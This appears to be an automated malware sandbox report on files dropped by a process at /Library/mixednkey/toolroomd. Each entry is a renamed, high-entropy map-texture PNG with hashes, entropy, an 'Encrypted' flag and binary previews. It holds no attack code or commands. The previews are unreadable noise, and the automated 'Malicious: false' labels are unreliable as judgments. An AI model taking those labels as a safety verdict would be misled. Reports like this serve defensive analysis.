Preview:	.<.\|.....f.A..vM..j..<".q..o........"..h.).6...6.e..4.....@..+.z..lu.....,..=../5.~k.......M.v.t...i.Q&=.t8....Y._.9...~...R.........z...+.....E.....!P......9......ssu.~.8..0J.8...9..l......x...0...v...G .....;....ZyiOid....C.i..F........?.7.HSv.....bW...`....Z..=..m.#.m....p........2.........2.el...7\|=...2...N.R......N.uD%h........G..H........3vo....h.}$.<...j)....0bI..6d..{..ry...q.2.../.G...Z....ca...$...u.6g.....4.91..:...2.4..%.Di.:..k.qMJ...)..][.....F.u&6y..N.?fW.C.K..-.OK...s.Y...0..I.{..aH2jq.Rc.7.z>..{.A.P...@.../.o(eb.....^,."I1.....K.C>...v...~....@Y...:,...w..\)1.b..;y........(..7..;.@.f<..2N....c9.......{...T4B.imj/~.:p.Z.{h..u.Jg.Ax..'.v.L..Uh....>#..a7.L...>.^.A...?..:........{.."p.m)p....F.BNB=.M....}x#...z.k;b._1$.."x......`..Q$...[.Sl.-.....R....c?+Rb.(.:..L.@.R........8c......d....p_>tkf...{....oI..16@.b..:.B.^_.PV..e..f...P.{"..A.%...C.....T.....}jK...0.M....-...<.....#\{2....".;A.>.^..]..E.....r.

/Users/berri/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverSand-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	17971
Entropy (8bit):	7.982069692496279
Encrypted:	false
SSDEEP:	384:UdZM7e5t15N5p5waVzlZHwaVeDeHpzE/QJuRVAYWsgL:UdZRJV3VJlgoJuRhvgL
MD5:	FEA186A424E3C2BB70EF7D947CC17C1C
SHA1:	3258EECF3797B9737C266F977E96C62308DDC8ED
SHA-256:	31D75616CA05674A949ED955B0B86EF27DD321E066AB8CA36CC1E9617E638CCE
SHA-512:	624AD32DA48B09B25CCAD7AB64D5B68104EA739D9D982DE0804D3DF3D13317EE9F301516B93F9D0DF0A6A6A247E198359C2033807C02D64DEC854DC7B222BFCB
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f....8`.N}.j..D.I....lA@.+$!...6%.....x.;.k..cI....c#4O.8.6. ."....._.x.Xq..;..\|......Y.....!G..~.>J6...I...4).&.'.......P"....x.nm3.k.h0..-.$N.dm.+.M..A=".b.(.....C..\|......z..E8.QGy&....>...d.m..[W.^.Fg..v....;-.#...uG.7.E......A..v.{dt..^!......Y....$... .\|....c>..A.mu.~.....TC.4.+`.?.=n.i.!.p.S...* 3..+.._[..B+.@.Ec.73...i..\|d.xH{........Q.J...Q..W...RA(.L..]........t..5V.C. .....A..6.<(. .5.>....F..ZD LBe.E.E.U.Af..}.)a0..!.:.Ij..Pg.4..Q..K..&;..t.{).l8./..8....0>].-`..A{...D'.7..:...C..a.b$..t&.....2B....[......y...\|.....F.!.@..._.....>..!.300_....+......_7...........eM.Fm.U &J..w.oo1.?..k.6.....x/.x..........F..!...gh.^...FF7X...[..z...Q..."..T.)..K..,kG....."....0.....C.7.<t7O...h...\|..\|...6...H..2Yua.yjK.on..7.k.i..i..`..,.~.r......2....1..a......h/n..].R....h..C 3.......awb.D.Lo8......t..]-.H..{,..r..........'.F.h.......[..}T.OE.==.3..LV8......%.T...9.z.

/Users/berri/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverSand-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	62741
Entropy (8bit):	7.995860748569132
Encrypted:	true
SSDEEP:	1536:8hvMGAlvxUJ6wZBi6j1zMBNyDrLvaxmvaHUxkqVw8AVEwQR:8EndxUnZUG1BrLvntarCwQR
MD5:	BA1246D1EC172AE7ADE1E423E77F4FF7
SHA1:	9D047A4B5F9FDD996F8ED19723C4697907CC6DEC
SHA-256:	28AF75729222BEA8661F826D4749B4BA5B296DCD8B28D316659FBDE26B1E487A
SHA-512:	6DAF47DE4F189641DD64EDB9943307EB5E5AA959D4924E410DCD6F01573146A8D705683D91868D89D3B884F9A00C907D69BD71DB9AA0B808D7A9ABFCA3ED0C53
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...Ok..: .w.E]....P'.........`...b.}......}...x....i.........+<)CB.......+X..@..G..^..f..%.A.[.eqx...zV/.1..S,%..-...%.AN.....q......d)?.2j.b(7......y&V...$...}.L~.p.[D.....i......!.Fp L......{......@..B.....y9.r-..-#y....r...{6.. .R..^.W.....%\|Z<...Dm&....[<I.V...~.".._.B;.E.D..\!r..)gt,.V...a.c......H...6...QE.......d...j...{.xk.E..... ...is...\l.k.S.lU...d.........=a~G.W.78G.a..G....).z.eA.r.....s.x.I...`..y.B..12._e"....}.g....G.T.{#..<mp....6........VO...:>.#4.;....j...U.2.!.K.Q_...U..bv...`.....&.\|.a.......i-......>N...$cV.d..w...-....a...Wc.b#w..R.gcO.wJ...$..M...Y.ib...v..e..L=....%+~^?.;..!....nu3..N..!K.X....%. .eZ\~.....R......7.b.`.SR<.Vx...U8..c.:..;..X\|...k...Y...@.z.w@.S...kP+...D)....K..`.?p..F....AA./...1...E....1...A.l.N...Wr.2~wksC.k<.~&.iq...G..m,.(So..Zn.....C5p.@.b.........T.....U.!...}.7O8..jL....@371.2..l....y2o...9......S-.&RP.\|..qM..v..~

/Users/berri/Library/Caches/GeoServices/Resources/.night-RealisticRoadHighway-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	29443
Entropy (8bit):	7.9913677252349435
Encrypted:	true
SSDEEP:	768:X+oH4ReAz0UcVf/cEnBnywcesMCcY1wxBimqO:X+ufJXcJwjqcY7q
MD5:	C624FAA6888A3AE0F15B6BE20D50AD57
SHA1:	066B41478B3066750F7D7B740728EC1D1E25BA26
SHA-256:	504F8F0A73D5A9D7D7EE62C520A4217FB62680C0FB7498FAE56036B838C86C52
SHA-512:	43EBCB761C81747EC6A844DC263C0A1B7A2F187078EB73913713B890BF8A796AD2274E2E7D6EC15B458FB555054FF8BA796CA20FF76E613D068A939A3842F54B
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f....g_qE%.......+].na....@c....}.......F...C......KRDE..d.%...@x.DW......p1....ea'.._.W>OV~./...t@.b...:...g..LPK9,.,.T.P.PJ.x/I4..[s.H.S.s...v..T,..I.a.}.E..x4!.[..r.P..?..d.H.[X..}`..C>..x......E/.=........w{..n.5Ii.C..QV..=<...r..........%..l..]}<S)..Z..$]...%l.n....V.e..T......j.$.i.x........U.[.\|y..t.b6.xL....}<....F...j........hZh+X....y.....J..X...}5(N.G.......z.._.%..I.yJ.+.c.!..c..O.6.pb.....gQ..>+.c...%.=...[+...B....+j..q...?.e$?.. .9g.o..........E..O.mg.CD\f..%..>.O?S1.....g.H_..:.c8...r.6....G...-..r...4;.(n.bt...S@9!.-.....U..=.........U..Nr.h...PN..\.i...q..O......k..03l..+.v...H4.......M.....\|F.sO....Um.e....4.+.RG._.!...U..}........g.....g.A9......<...b.-.e..G....N1.,......7.n7..7_..4.z.@........n1.u....PIP......y.N..... 5.....x.....Q.]NR<#.W.h&..D&..H.?.........].Pp..z..T...A...0..X....kt..i..........N?..R...#D.6...;...Z.mGO..$u..b

/Users/berri/Library/Caches/GeoServices/Resources/.night-RealisticRoadHighway-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	142706
Entropy (8bit):	7.998595604308997
Encrypted:	true
SSDEEP:	3072:XmJC501ttj5kbWorpPPgP7BFAjJEB2cE3SeTXD45X+V:XPu55kbWsPPgP7QcI/XMI
MD5:	DF955D992D4F6ACF179027AF2CE0FEA1
SHA1:	1F1BFD4CA59CD3981FCAED4D29A67AD50460BC6D
SHA-256:	B0B6B633AF91FC895981EE5821D45C48FD5221F2EDD6647D5A9952AFDF799FDD
SHA-512:	EE73E842F28FCDAF61ABF398C73F4A5CD420130ECC9A3ED59D8438C4DA2548FD57EE5C4506BD30B6C272D397EE5E3143C7011B1DB2A62AFE900AC0C61B8C9165
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...s.i..^[&..R.GI&F..QX...S...b;....[..=.cQ e..&.._..&...E.d.}.......J........"..P..H..k.K.ty01s........-..&71T....Sf.C..Ks?-.s...#$@...Jlz9Lqt ....0.C.....8..C.W..R....\|s.wy'q.(.M.w..H}$.(.-V...{.d......j.._vG....P...T...]....Jx\...d0..L\|.qL1ve[..S.Ai......J.<.s'`..l...0...7.cc....g.2E..;....c....X7..`/.._.<M..\|...Uw]../f........~HA..B.9..-@.>u...9...."...:.A.6.....=..^`...p.q.$.t.f.w"EYH!ai......z...)...}...5esLNE....\|...7..3ev..6..0.&x.....%...{Q\|W8s..8g..A<w...K..".1..&t.BWE.}2+.~.E.\-.S.Q......I4D...P....<.J.c..w..~..P..z..........Ko:....eeg..eU^O ..N.EFQ.J~R.X..U. ....\...t...L...^.X..S..2M.7....B~...U.{-.5......@.....9..U..;..4WL(.n&.y....>.{..,. -.zVM...;.....0.....wER..^..2YU4.,[..r.k....M.W..W?.-..I=.[R...!.3.....C`.....%r.Z.....@....@.....Oz.....FM....p4..k}+m(~..u.K.e&.l....s..-.X[........&{...../..\a.m.$..@5.Q\|-...3..g...y....=.}d.I..ot.9.g_..

/Users/berri/Library/Caches/GeoServices/Resources/.night-RealisticRoadLocalRoad-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	29715
Entropy (8bit):	7.990255162535095
Encrypted:	true
SSDEEP:	768:u3tK86lPcvDo9godk627SIlWNgGwinMMUFL2wFvYbFV:u76CDo97x2ZdinrUFL2wFQj
MD5:	A478114C9662A705C686293D6CB1C1B8
SHA1:	E983101D4CC93FBE3BE236F6FB44476900DECE64
SHA-256:	A0D1EA7DB0DCFA97B6B83BEB430420B28A77CEC01EB952E6822E484D38DF10CE
SHA-512:	4AB66ADBD2F92503B9D3EC8DD5A2D76860BA4E76358BC0712430A070C8D081A9A101FE4AB7BF759E3589C71D4B73048BE61298CE458B36AEDECFFF38756C32B1
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f.K!...9.PN.cT..H.T...60...r.....w...;{.M?.p.S...J.DL..#....7s....#L..6].h......z..D(e..+9}..I....3rUP.~..bt...+..j.Lz.>.q..7.g....v......2?.n....,..,...W...D.W.......O.K..3,. +.f9\|_....s....fr.,[7w....gj....d...z..g.t.c[..w.......3...8....5N...".......?.G.........l.P..d...bV..y...B..\-..yc)..../Z.i..6QO[.l.S..BF6N.ck...c.{G.t.i...{u....&..5I: ..csiR`...z. f].Vw./..t.n`Z...aI.....=.........p...W.....-,}$\|.\..$..=.D.. }n.@...\|../>.....t.g.[.u.=.W..]v.."....F{...y...._.....<.yJv...Z..a.."S.c...Z.'G_OL.`..4+..._.C....K.0....p...D<&.,.N.+g=P!.`.T.&{5.r.Sc.3......\|..wh.......W.0.X...*..'..[./......r}.P....%...../..P..7.......T.L.......\|.".+.z.q..$E..z.]l.9%.X..[.Y....]...2?.}....!k(..u_M.k$A.m6].cF..E.zp.K..]6.qV...5q.....f.......6.f...Zl... 1!F.5.fe;....=x..y3vV.9...P.@u..d'b....G.3.W..B....$...d.G.k.}.g....R..:.(d....K..\|....u..F.uA..]?.........N.......s....z.O

/Users/berri/Library/Caches/GeoServices/Resources/.night-RealisticRoadLocalRoad-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	141042
Entropy (8bit):	7.998572340282718
Encrypted:	true
SSDEEP:	3072:NsSVuCDB9/nMSuJO2B5wzT3lJO5Tq4HsQvMaF7H:+SVuC99/MSuk2B5QVJsvF7
MD5:	4E732F548FD356C5793209A31EEFAA3E
SHA1:	CD7DD9C17D84077BC027445512DCF889E3D12F90
SHA-256:	9C9EEA57FF6C44DE976BF61BDFA958D7A8D7D45731C1D1CB58EE75FDE539E701
SHA-512:	0D7763B98678CFF9F7E065A9B78015D3999B2C05A9DF7CB740577872F47F69180BE6E38EC1895E180F387A64BF6E98A381462217FF979E7F689F65DBCFD8E560
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...\u._...w..k.Tm`.r.........:..ju.U..;.b.9.I..}wUp..W.@.Jl.VL/A....A..X.Rl.E'..]. Z.%\\.,K......m.....z?..O..."...}.......d......?.%+J...4F'.........p.\....p.hb...]EmB..r../.nRR6.S....=. +.A2....S...$$.m..Wh.....$...5`._!.ih..y~...db.....OUK>.C..WE. .f..k.....81.u.r7..n......Gw.>Zeo.a..~:...u"U.J..;._Lp.~......-.......H...fX.i.......$.y!z.9.........r........\,q.....^..u.?.....<....9c....}4......g..,7R.Y.Q.?..@J..>N.I<....R";..f.5........7ZV"........E.f..m..n.~.-.\>....D.. R=Gbv_.f.+P.....@....2BIeS.Ka..Y..\|..Yu8^m....E.iCe.:.%...u\D.E.Q.`<..M.^.6!.q........l...f.b....Z....n.%/...aum.R.....x.....\...iV.lu...p.3.hz2.s.zy./z....W,."!...ir}\.dQ..re......@.{Q.LtLw......MH...Tpn7y..U...<...4.h'(..u.-......D.E.7.m.....`...W.7...C.B.hJ....$.7.o\|*....H...V^9<.L..."X...R.q..\|r....~..]...X.q....q@.w=..J..+......dga~........H..U....g=.y...k..t[....u......T&2.....c.d.">..

/Users/berri/Library/Caches/GeoServices/Resources/.night-cemetery-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	18931
Entropy (8bit):	7.980669299488822
Encrypted:	false
SSDEEP:	192:mrREtAAMjzQ6grBr8WqLefEpbsnKsoOx60124L8xm64UJM3FQ9P9hMYuPN8obu0N:2ESZIeKEeXgGaPL+FyU03+wALavdbrU
MD5:	2DB6F715AEA6506CA80B66C2BA1FAA86
SHA1:	85B820ECC7A8B09BA172CA17C7191CE047160FDD
SHA-256:	6AA6E2C965DD7652506020D12A2B417F3B4D698C169E232E5CC8D4C44D964CB3
SHA-512:	94D37473578D25834ABA8A54990239CDE7F7766D3AE9CE9B0EC3D7A0274BE3CCE8775511D8B31AA6CEE9D34ACE978B06796EE40A01E25934D3EAF6FEDA6C6C80
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f............:.P.9................S.0......`....P..._.D..}`.;...MiE/,....0.Ql...Rf'..B..'.\j...>.4..o"e..N..7t....r.'A."a.!L...A..SbbP1Y...._.5...c...B4..l..c.G{.C...{.....Ki,...f.}i..L..3.Y.M_...+..<..f....5.XU~S.R...z./lv>...m.l.^P.W....n^.#z.T..%.U..../w{S.~s..f..Hy_..}.{.'...s.[...y&.bB.._.....t.H)..[..o.....].Z3n7..h7G#..L."....lg..x.<V......<B..X..,jk..j.........,Th....T-ZR.d...^.8../WM.{(.v.-v#...!...\....d...W.....Pv2J.....-R>!.=.:..\|...$..b;O2...4...!..dO..W...I..'.%.M..'t.C....h..(..j.....:.uZ....I..$..VT...4..O...Ck.Y.....k...}/t..........X..A&W_..".M.suur.K.7B...3....El.B..a...&.GRF.....A..:.f7..i.}xGl....naM...wc.pU..LJB..zJ~....V.w..7...].....O...8.TE.\Y%.c.(....->@.:.....rkc/o.KG..?k..=.]...m..}..Yb..$5....r:O.=.....,.D...e....(.x..=.oR..X.y..)k..^........v.......q.b7....B.d.t.....J...X....j..W2.\|....e .ew.....GS..+....\|..........o.Y

/Users/berri/Library/Caches/GeoServices/Resources/.night-cemetery-2@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	53701
Entropy (8bit):	7.99495196807859
Encrypted:	true
SSDEEP:	1536:TNtUfxtQ7U1d3U/VF3Ww6xHx407V5cTp17vbuE:TNtUfgMKqPvI3vbuE
MD5:	7A1A7FB7D6229D49396C62C6ECD8A1D9
SHA1:	E4F61D1B231C50B848BC7120394B423FE42CE15A
SHA-256:	FF3926E0F96E8C9A5A5978B81C38BA773B791426FC70106A9037B9F584CF3906
SHA-512:	8A1ADD92D90297C1D5AB0C672196D5C87CB239815AD80F287655297360D20671C896B635D10983C5E640D3E2BE6A4913C4CC4EDEE303C6E4C1FD6D9298BC72FB
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...1.a....2.Q2..+...@.}#..8r..G...^ u.....W...n..e...$.9?.>.K).Qf....2h...Kz.0...s3b.=.2.....^...U ^.M....ND.2..UA.......O........X...d!.%...._idE..9;......R....%.....@.U......W8.1..0..F....cz. 1v.D...f..7v.j-.rz..j...H.".bxoo.....Q..&....3@l..b.....WV9.Ue...<q$.....$.;.8.H...M....n....t..n_..YO.7...$4^.....2....u...S..3..F....!3Q..=.........ZvMT6'`!>S...x..ie.h... :o..8P..s..9.......q..=./.....^.[..5{ZOe..j!.N .;FtpH5.f..4..2.N.JI.>.V.n...'.... n........6+.Va.FQ..7...Q..<.2_P..+.oO1.k#._A.I..!V....Nk..2e......bw..,...Oc...%..N0~..{.h\|."\|!.."Cn..Ge.u..{..i,.L..WMZ.:.:*.8$4^.)g..N...<>.)/$..%....s.........s.}s..3..QhV.TD;.c..1Z..(....'.{.H...t"...P..r.w.n09..( ...<....P7.........#).l?;...ok.+..jJ......wk>.{mK.W9.G.g..sL.j....!..E....Z.G._..:UH...Q...I.R.r...0,....D/ -......L....m.g..hsW..G...........pa2.t9...8.Z.w....,J.\|(\|#Ao.....$..p%.S.v._h.$...h.G

/Users/berri/Library/Caches/GeoServices/Resources/.night-concrete-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	21603
Entropy (8bit):	7.984341516745446
Encrypted:	false
SSDEEP:	384:4CYKgEYprKizUj/RyJMMzNkROvAKlHm93uxkLAbqhkJDVH:45KgppgscxeHGYQRhkJDJ
MD5:	9BFB1E845457CB2A11809843CC16870E
SHA1:	6F4CBCAE21BCF8089E08D75DBAEA85C5F9529E0D
SHA-256:	8AA1A624156E739F7C498FDE04662DF691E10B635C01586A38A1C5127E076086
SHA-512:	49BF058853C5FE12AECF2C7C85B485F5C14EFA41DC7B3E1C8E406EF18B3A6F59A7CD9ECA8CB98519D7A82E69F9D7E5588B40394E9C9B07CCAAB1B8AAA6E54902
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f.<..nw...9T.~~".`rW..:>..\.s".......Q.H..g....g.h..@uX...V....y<..w.Vh%j.M+s=.J.8.........sV......f`.KP....b.1'..P,.v..3.:..]..N..#8..L.N...h3.D..$ QQ...c....y..P~'_}....{K.............B=...(f.D..cS.:v.......C[.uq..rXS~..4.D....l..%.....,9....Rk=N..!.@]..xiMb....A.=d....C...A...P..qGXv../...Y...}..."j.n.%L.../..a!.+.9.......[..P^..s.e.$\|q....hQqGp..Y.,..,...Bx..c....c..........J.X...[?..;..........G`..k.\p.M.[..WjT%.YA.)......!p I......v...k..g...0..f"Z.."..U4p.jo..3.~i\|P..,lQ..t.vpSX.....Z..... ..`.O..............;=.m.....[..w.t'z?.@.........YH...[[......\.<P.X+T..gY.X....!.Z..H....:.1...}uJ....,....XQ.8.hG.."..]Ec..[2....?....p,5.DZ~p...c^q.((.S)..}..;/.?..cp..=-:.^]..4..P....to....i.O...f..I..R.C>P..B.f...D'....v...Y.A,1.......fq..."Q......,.?.r..h.=.Ti...#Zo..Le....L..........RM"@$._.....u..>..A.%.@...5..KQ...F.r..Po....;D7....h!......t2.MZH..KoAaa..BC...

/Users/berri/Library/Caches/GeoServices/Resources/.night-concrete-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	86823
Entropy (8bit):	7.996913152709884
Encrypted:	true
SSDEEP:	1536:PyP2qkpPlH6ZooG2OB4muoLxXJfndXxRmBAXTy1gMvGR6P+tJjT6vpIpPtConj:PfpPp6ZoOOB1XJfndXqBAXTy1gMv6AOz
MD5:	ADFE5B82CBAFA68331A6E1F4005DEF44
SHA1:	B9E676713F2340DBFE6EF5AC3335A02545135163
SHA-256:	5B99B13B16FA3F07A0B8608CDF388AEB221188E9A25D43B6B37D3F04C12DC5DC
SHA-512:	9081DEA514E1768C7BE5CB2946970889439F481C9A7C640E1ADFCCF8671379E1836DCC524685AEB546BD8DA30F528C87289555E3214FA68873A9E2BD218D9FBB
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3......(.0,<k..F.Vu vZ<.yB~.Q..p..8C..B.5zp....q]..L......u.[....U.m.-qJs.Iz...U...L......6.?.5d.....F...NoV.&..Z.5.%.dLR\...&..d.n.i.6,... ..J.Y..-..=D.D..[..7....YO..1U.......'.{.nn..s.......M.fk.5CeiC..s..\4PV....&<c....,y.Q.....r].....=...2.T(=...z..k1j.UO7l..n.A...\[}..b.Y.W.d.!.`NA.QI.&.n&...@../.....)e0...a.w1...7....+.ry?k....Y...Q......b....%.y...1.9.n].T.V4H.........4..w...P...=.o ..\|HG.ko..j.......QZ_.....T`)..=...y2.-k..^(....!!...6%.qM..?.N=.#.7D........v26G).}1d..I.U..Q....ub..%._k.VZP...<R......4...L...q.3pm.B..}"..m.w.E......m.qY.....z........A...?..$.oD.j....mW...('..&...;...u9..Q..."Q`.....J]...$Y`.:...nuL..}M.`.y9.m...x.{...A.....w,...&..w.N+..%7.%.......X..2.Rmk...."....L...x.s..2.+ .....R...>...Uc.=..&.......z..i&.....qJ;.}xF.:.L..Y...(&.f$.....{!..Q#.jk...8n...K.....x.8ZL...........~oss~..Jp..%....b.Z{....1..~~..E.........j...p...R..&

/Users/berri/Library/Caches/GeoServices/Resources/.night-golf_course-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	19763
Entropy (8bit):	7.983504751278479
Encrypted:	false
SSDEEP:	384:AsvWchnh4slbmH8chDwN3Gf9zxggKHGjJwXLKSq4DZkxbqI4:AgZhh9lb286DwlGf9z2g19i1DZkr4
MD5:	08DF25F5257850FC04F2517D896C3F41
SHA1:	9145968871E4B72D0381C941B09B476019D5C826
SHA-256:	5B8D83F01E13F0AC8D6A0BB8E6BD09FDCB858ACF0A0EA655F538CD0C78387E26
SHA-512:	85F7666F4F1109C8967400A97202E97D2B5E3DC0AA7D193F1B21F82FE3F253021CF57A9F48EAA9CDF9784342503414164DDC3DEDC41747691587E22FB87DF656
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f.._"D>s2+0...b;e..V.0N.[.........z4l..........v..E..G..T....w.v....1..w.=u.....ebN.......,J...g....%.(K...o....%g.I.D.<.....v.Y...K....y.?P...m..'.z.@W.QU..j..).l.>....G...c....tC'.s..}..>+.+#.(.@...d.n...v..Bm.4........>S.f&......z..5..!.~j.kL...0..qQ.r.[QU....*..9@QX.mT.?[..L8.^.\|VU~RY..^..Dgx..'.X.......K..sio.......B...;..........C.....]H..d.Yd[......l..5#.........z$.....2.>.,.......d#...Lq....$n...-...QN..n..sb.b.D.I\|.....G...uI...^h...........+9....z..+..$%2>.}..$.2.).h..=..........K......[...28"...s.'._.+...)/.....bK.9t.5.Wo.^.=hi....'.' _..).$7hY...bfm!@...^ip..V...Y..3...I.>..k.~.P....._.h.1.`.."#].VLIA...f<...._.L..N.E}~...;..#>...1v_c.....[.V6.X\|N.q)...P.......3[5...L_:;......[.[F..3.8...1.fR..@.1.w.`[.:......a...?y.q#[.........@.y...}"....!.G..Q......~.......c...$..~...R.....D......]...E2...^=..)..b..8K$[..!.b....................{..$...yy.".

/Users/berri/Library/Caches/GeoServices/Resources/.night-golf_course-2@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	56549
Entropy (8bit):	7.995047235130399
Encrypted:	true
SSDEEP:	1536:fFVkIfyvSwkzCZov+MpblqoDrL19dhpg7bAYpDi:NVlffFzCWlRU6L19X+bXpu
MD5:	986DDC5D4E6B3416C1DDC9E59D12F0E3
SHA1:	EF6A60A529B2FFBC8AC19F72F3F8E68B33E18A88
SHA-256:	29BD2A5EF989A8DA056578B13A1E9B122D7D04733EF1EB61DD72DB21B303D8FC
SHA-512:	7FF2059934C606B6D0E30829E4244B5E27E889E1877A34F791B6A28A7BA822AA053B09D436819B4ED6476D137F3B31F6FAC8EC2AD5C4D02A252F0D98CE23A8B6
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3......Nm.3.K..3....4....M... ~.~.l\|.P[s.2.A."..(3,.P..f.91.iM.4...?..).X..N3J>o^S..9.s......WJ{;.f..1..~Q.....=.WH1..K{.hvO'~oV. a...u.h[KR....@..1.N.7.&G.Q.F...GgK.."..zs..O..&...O..('..../).N.[..%..w=......-.R6.....f.....%.?.J.....(..8r...d..K....X....28 .D...4.`.. .g...v.{.Of..0A..#v...+d[G.f.-....12'..l.....w..M.....R.0j.L6:.Z.b...J;........._j....RT....T...a6.g.}....n..,.X..=dM(n........mi.....yG...I\|yG...yXm..;...j.EU...sXQ.Y.I...x.$"T.....G...X....E..........H.0$#...?]..v..$..#....k.I.<.,.5....f~....).........i{...W[s...........0sR...5.1T....=.{J...p[.Z.\|....v..^...^4./f.[.F ...`..2..a..~..#Kh..=OZ.S.pt.g...e..b......E~\.-.L.tX2#. ].....S.Z.5.~q.=..K.\|&.Z.....F....c...G=w........q....b.0.. .......1.R.)(....a.......j..i..xh.q..a/.."....'.C.=.De@..4i...".t\..n.G..... <.S._.m....u.p m..H..>........w...[......../......B.rqW..-lDZ...<.j.....X......[`.....$.g

/Users/berri/Library/Caches/GeoServices/Resources/.night-land-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	706
Entropy (8bit):	6.6002469387183496
Encrypted:	false
SSDEEP:	12:WP+kILqKNWHWfB6muZpJ6mN/FHIoajogsewLYTc+qGm7:ooLoHWfBcZpJvdHJgsePc0m7
MD5:	E4B102BA5AAB0C796ED3021F291C2304
SHA1:	5AE1ED342B1D3E5FCE2E96E768B9121F33B4A835
SHA-256:	29BF892E5C336374F47C9F78099AC8BBDA44EBC873FFF94AA057B18B981F542B
SHA-512:	C8E369B8EF5E5B27CE70CFCA5DAD65D4185FF250ACDF8BEE2E5CA4B6C6B493230723203CC056339C8AC091C18A700045669F9FA9C5818489BA9C3E8253587ABE
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f.?a.}bs.a.Y..?..U..l.{.yZh....#....._..L.T.XW..`...2.(.;........e....l\|{..C..,..].I.S8.C]VC...;B.......z.0K...C...D.....=..L.6j&x.l$Il.oW...v....s,......a`a.XPwM:.t.}<.3..b...'I..B..1.Y4.Tq.>Q...z.0K...C...D.....=..L.6j&x.l$Il.oW...v.._.^:....k..;........e....l\|{..C..,..].I.S8.i\.2D......o+8.7.Z7.E\.:s.,.;......................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.night-land-2@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	6.857449528920581
Encrypted:	false
SSDEEP:	12:WP+52UxYTxRutXueZwyu7yuxFfZwyuitZwyB/Ju1UwkZwyu7yh06yu7ysJ0ZwyuE:ouevuED71OijuDh76n7D7pKfksePc0m7
MD5:	17BF527491FC9E6E06DB3AC7D5A7C6AD
SHA1:	023630EDA433A4E9F7A96E626D554CC81B8F4F14
SHA-256:	E5AD5B6947DB8204C4B5AFD23F14FE0FB5ABEA08417D8E35D75775509A068988
SHA-512:	76AFA5E6BB472135B678CCEAFA5AF1334DE12AD35A8C7F07A4348F152095BCE0BB3B4C93844F39C9CACC08A832DB67647080D14C51E3753D38FE8F548B5E4FE6
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...E..R...^{.$u.f..#II.PH.IZh....#..6.........{.....8..6....Hp.K..+.I....<O.....).%.Ok...y9"..o..i.3.&......h..-C!.".MK....~.:.%.Ok...y9"..o..i.3.&......h..-{.....8..6....Hp.K..+.I....<O.....).hh.q..r{.....8..6....Hp.K..+.I....<O. .Z.qp.%.Ok...y9"..o..i.3.&......h..-C!.".MK..1.Qx.$%.Ok...y9"..o..i.3.&.....$.c.....w..q..r......_%.3.b..~...HDqFQB.U..W>tyI...l.9"..o..i.3.&......h..-{.....8..6....Hp.K..+.I....<O.....).%.Ok...yl..Tq@....6....Hp.K..+.I....<O.....).%.Ok...y-q.4m..I.3.&......h..-{.....8........9..{..9"..o..i.3.&......h..-{.....8..6....Hp.K..+.I....<O.....).%.Ok...y..3n.FBH..6....Hp.K..+.I....<O.....)..`.....J.\-.\....)'...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.night-land-carplay-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	610
